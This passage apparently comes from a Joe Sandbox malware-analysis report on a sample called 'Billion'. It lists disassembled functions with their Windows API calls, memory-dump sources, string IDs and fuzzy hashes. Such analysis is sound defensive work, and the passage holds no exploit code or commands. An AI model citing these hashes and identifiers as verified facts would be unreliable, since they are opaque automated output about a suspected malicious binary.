                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: *$LPT
                                                                                                                                                                                                                                                                                                          • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                                          • Opcode ID: b283ef49ea117909da74e0e11b2527b73e2790e9c6a4cf8c06ef50d3ef1cc7b8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 46d8cbb692731eeb541f33f354b0d4143108405e4a36d020d916b179fed6eab1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b283ef49ea117909da74e0e11b2527b73e2790e9c6a4cf8c06ef50d3ef1cc7b8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C918D79A04604DFCB14CF54C4C4EAABBF2AF45318F198099E84A9F362C775EE85CB90
                                                                                                                                                                                                                                                                                                          Function 00195703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 001958AF
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ContainedObject
                                                                                                                                                                                                                                                                                                          • String ID: 0$ $Container
                                                                                                                                                                                                                                                                                                          • API String ID: 3565006973-1883905345
                                                                                                                                                                                                                                                                                                          • Opcode ID: ebaeba3a955eaa4820ce4531e504725e1626176e0a2151520ce1ef6bb73bca51
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a7dfd130d2d6825fbe336d545043d6ad10bbd187c7128986294d4bfe7b82a62
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebaeba3a955eaa4820ce4531e504725e1626176e0a2151520ce1ef6bb73bca51
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B815870200601EFDB15DF64C984B6ABBF9FF48714F10856EF94A9B2A1DBB1E845CB50
                                                                                                                                                                                                                                                                                                          Function 0015E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 0015E67D
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                                          • String ID: pow
                                                                                                                                                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                                          • Opcode ID: f27ad52df4e19fa3328bc8a71146f8db73d0af1109addb0fdc20c09186fc22bf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6f2110eca347572cb7b512970b6c6351352e2ba9c4cd51ad15107e08e80a8e3f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f27ad52df4e19fa3328bc8a71146f8db73d0af1109addb0fdc20c09186fc22bf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C519E71E09102CAC7197714CD0136A3BE4AB21781F304F59F8B54A2E9DF358EEA9A47
                                                                                                                                                                                                                                                                                                          Function 0014A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: #
                                                                                                                                                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                                          • Opcode ID: d6e0c24aa3e0a60651b22e22fca92dc3807fbfe2721e7925e8503b382a8e9ea6
                                                                                                                                                                                                                                                                                                          • Instruction ID: c39f781d3c007bafaf6c019b561db22f0724e948621e06848348b07fa70d2ec1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6e0c24aa3e0a60651b22e22fca92dc3807fbfe2721e7925e8503b382a8e9ea6
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23515572504246DFCB25EF28C451BFA7BA4EF25314FA64059F8919B2E1DB309E82CB61
                                                                                                                                                                                                                                                                                                          Function 0014F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0014F6DB
                                                                                                                                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0014F6F4
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                          • Opcode ID: 777ea415edcf4d7d2eafa04ed33719b400298d335fa38ff7b5c89f21a1023c9c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 53c49fad492f35efbcb4a2b0c6859f28be26052125ec752dd244661bfd812fde
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 777ea415edcf4d7d2eafa04ed33719b400298d335fa38ff7b5c89f21a1023c9c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D75158B14087489BE320AF51DC86BAFBBECFF94314F81885DF1D9421A1DB708569CB66
                                                                                                                                                                                                                                                                                                          Function 001B61A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                                          • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                                          • Opcode ID: fd06217b949ef3fc5930044bfc28a9716a329ab1ea7f1b5fa5648e38be9c1799
                                                                                                                                                                                                                                                                                                          • Instruction ID: 764dc7556bddaca66f010e5c307caae4111af863327aacfaa4e18a97165a9b26
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd06217b949ef3fc5930044bfc28a9716a329ab1ea7f1b5fa5648e38be9c1799
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3419D71A002199FDF04DFA8C8859FEBBB5FF78364F1440A9E506A7251EB749D81CB90
                                                                                                                                                                                                                                                                                                          Function 001ADB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001ADB75
                                                                                                                                                                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001ADB7F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: |
                                                                                                                                                                                                                                                                                                          • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                                          • Opcode ID: e40b30923bc145d678eb914b41b5ba2be2377f74f1bee22e0d95f4dddc826197
                                                                                                                                                                                                                                                                                                          • Instruction ID: e3a2772f77873015394846a6af44a8009111c10137b0568da9c7b458517f4bcc
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e40b30923bc145d678eb914b41b5ba2be2377f74f1bee22e0d95f4dddc826197
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA315C71801209ABCF05DFA4DC85AEEBFB9FF15314F100069F915B6166EB719A46CB60
                                                                                                                                                                                                                                                                                                          Function 001C4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 001C40BD
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001C40F8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f6df25cdffdb96949fc86527c85f779526c602b3226338a002c49d5eaacaadf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7826232c217c460aee29876b47bea93a1e6f0fa0c9f0cd0d500bdd71d12ef49b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f6df25cdffdb96949fc86527c85f779526c602b3226338a002c49d5eaacaadf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2931AA71110604AADB208F68C890FFB77A9FF68724F00861DFAA587190CB30EC91CB60
                                                                                                                                                                                                                                                                                                          Function 001C4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 001C50BD
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001C50D2
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID: '
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5da8b2049f70b765f49a15cde2bfa4227a3963e1362dbff914ef5818e98abcf1
                                                                                                                                                                                                                                                                                                          • Instruction ID: eeec6053408ed811558ee7a0d34af2b9979783c9195575ed28f0bbe2a6e6e6f6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5da8b2049f70b765f49a15cde2bfa4227a3963e1362dbff914ef5818e98abcf1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A31F574A0160A9FDB14CF69C881FDABBB6BF59300F10416AE904EB352D771E995CF90
                                                                                                                                                                                                                                                                                                          Function 001320B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00132234: GetWindowLongW.USER32(?,000000EB), ref: 00132242
                                                                                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00173440
                                                                                                                                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 001734CA
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LongWindow$ParentProc
                                                                                                                                                                                                                                                                                                          • String ID: (
                                                                                                                                                                                                                                                                                                          • API String ID: 2181805148-2181176062
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4b2a032e768d86391d44aba93371e3f54444a73345c0927ea6f546b05ca87416
                                                                                                                                                                                                                                                                                                          • Instruction ID: 63cfcfe8b84ba5641a5ec2b99ed4c8def0f3a42b6569095cda67a83c4c816548
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b2a032e768d86391d44aba93371e3f54444a73345c0927ea6f546b05ca87416
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A321B531601254AFCB2AAF68DD4DDB93BB6EF06360F254254F62A4B2F2C3319E55E710
                                                                                                                                                                                                                                                                                                          Function 001C41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001378B1
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: GetStockObject.GDI32(00000011), ref: 001378C5
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00137873: SendMessageW.USER32(00000000,00000030,00000000), ref: 001378CF
                                                                                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 001C4216
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000012), ref: 001C4230
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                          • Opcode ID: 6ef4871481c3e3986acb28efcb809a7a61aa034b2f5de3275dfd00bc01031a18
                                                                                                                                                                                                                                                                                                          • Instruction ID: 71ed8f45723ccef59d6447b77057cc011c986dd7e202ab988a621eaf60f74509
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ef4871481c3e3986acb28efcb809a7a61aa034b2f5de3275dfd00bc01031a18
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A112672610209AFDB00DFA8DC46FEA7BB8EB18314F014528F955E3250D734E850DB60
                                                                                                                                                                                                                                                                                                          Function 001AD763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001AD7C2
                                                                                                                                                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001AD7EB
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                                          • String ID: <local>
                                                                                                                                                                                                                                                                                                          • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                                          • Opcode ID: f2fde00b37011435a0b5168a215cafb5d0ff912f2844a5a041177f1705865369
                                                                                                                                                                                                                                                                                                          • Instruction ID: 9c810fdf1b355f0de28fc78e39f2db5e8b8b232445535416774a1afe97586b70
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2fde00b37011435a0b5168a215cafb5d0ff912f2844a5a041177f1705865369
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F11C675105A3279D73C4BA6AC49EF7BE5DEB137ACF10422AB50A92580D7749880D6F0
                                                                                                                                                                                                                                                                                                          Function 001975ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013B329: _wcslen.LIBCMT ref: 0013B333
                                                                                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 0019761D
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00197629
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
